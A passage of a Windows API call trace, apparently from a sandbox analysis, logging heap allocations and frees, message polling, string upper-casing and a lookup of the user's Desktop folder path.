hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0104.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0104.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.118] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0104.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0104.119] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0104.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0104.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0104.119] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.119] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0104.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75d80 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0104.121] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.121] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0104.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0104.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0104.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0104.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0104.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0104.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0104.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0104.124] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0104.124] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0104.124] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0104.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0104.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0104.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) 